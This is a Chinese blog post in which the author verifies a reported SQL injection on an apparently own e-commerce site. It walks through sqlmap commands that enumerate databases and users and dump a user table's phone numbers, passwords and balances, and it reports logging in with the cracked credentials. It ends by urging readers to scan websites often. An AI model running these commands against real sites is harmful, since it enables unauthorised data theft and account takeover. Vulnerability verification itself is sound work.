sql注入漏洞

作者: paradise_qing | 来源:发表于2019-05-19 07:19 被阅读12次

    扫描结果是安全公司反馈回来的,有很多安全方面的漏洞,其中有sql注入,XSS注入,宽字节跨站漏洞,Javascript框架库漏洞,MHTML脚本代码注入漏洞,永久cookie,cookie中缺少httponly属性,内部IP地址泄露等等很多问题,当然相应的也给出了验证的方式。
    之前电脑上也安装了sqlmap,就说说我测试sql注入漏洞的一个过程。不知道是不是sqlmap不那么强大的缘故,安全公司反馈的sql注入有三个URL上存在sql注入,但是我用sqlmap去验证时,只扫描出一个url有sql注入,现在将我用sqlmap测出来这个做一个总结吧。
    打开sqlmap之后就在dos命令框下输入命令,
    python sqlmap.py -u "存在注入的URL" --batch
    -u 参数表示url地址,--batch参数带上就不用在sqlmap执行时手动输入Y/N等参数了

    sqlmap扫描url.png goods_ids存在sql注入.png
    执行结束之后,发现参数goods_id存在注入,直接执行命令获取到数据库
    

    D:\Program Files (x86)\python2.7\sqlmapproject-sqlmap-c0d4db3>python sqlmap.py -u "存在注入的URL" --dbs
    --dbs(前面是两个杠)表示获取所有的数据库

    获取所有数据库名.png
    获取当前使用的数据库名
    

    D:\Program Files (x86)\python2.7\sqlmapproject-sqlmap-c0d4db3>python sqlmap.py -u "存在注入的URL" --current-db
    --current-db参数表示获取使用的数据库名


    获取当前使用的数据库名.png
    获取当前数据库登录使用的登录名
    

    python sqlmap.py -u "存在注入的URL" --current-user
    --current-user参数


    获取当前使用的用户名.png
    获取数据库的所有登录用户
    

    python sqlmap.py -u "存在注入的URL" --users

    --users参数 获取数据库的所有用户.png
    获取数据库中的所有表
    

    D:\Program Files (x86)\python2.7\sqlmapproject-sqlmap-c0d4db3>python sqlmap.py -u "存在注入的URL" -D yilian_shop --tables
    -D 指定数据库名:前面的操作过程中已经获取了当前使用的数据库名了
    --tables 参数表示获取表名


    取货当前使用的数据库中所有的表名.png
    根据获取的表名,查看你想要查看的表字段,这里我就查看下用户表,猜测是表名中带users字段的那些
    

    D:\Program Files (x86)\python2.7\sqlmapproject-sqlmap-c0d4db3>python sqlmap.py -u "存在注入的URL" -D yilian_shop -T dsc_users --columns
    -D 参数,指定数据库名
    -T 参数,指定表名
    --columns 列出表字段及类型


    获取表中的所有字段及类型.png
    根据表字段,爆出表字段值
    

    D:\Program Files (x86)\python2.7\sqlmapproject-sqlmap-c0d4db3>python sqlmap.py -u "存在注入的URL" -D yilian_shop -T dsc_users -C "mobile_phone,nick_name,password,user_money,user_name" --dump --start 20 --stop 40
    -D 指定数据库名
    -T 指定表明
    -C 指定要爆出的字段值
    --dump参数,打印出内容
    --start --stop 表示打印多少行到多少行,如果表数据量很大的话,长时间获取不到,可以加这个参数,先获取一些信息


    爆出表中字段值.png
    红色框中直接用户名和密码都打印出来了,简单加密的密码直接就被解密了,从爆出的结果看,数据库中字段存的时候,密码还是加密存储了。现在使用红色框中的手机号和密码,登录URL,直接就能登录成功。
    安全测试还是要以实战为止,没事多去扫描网站测试,扫出来的安全漏洞,需要去验证是否是真的存在的漏洞还是误报了。

    相关文章

      网友评论

        本文标题:sql注入漏洞

        本文链接:https://www.haomeiwen.com/subject/ufpbaqtx.html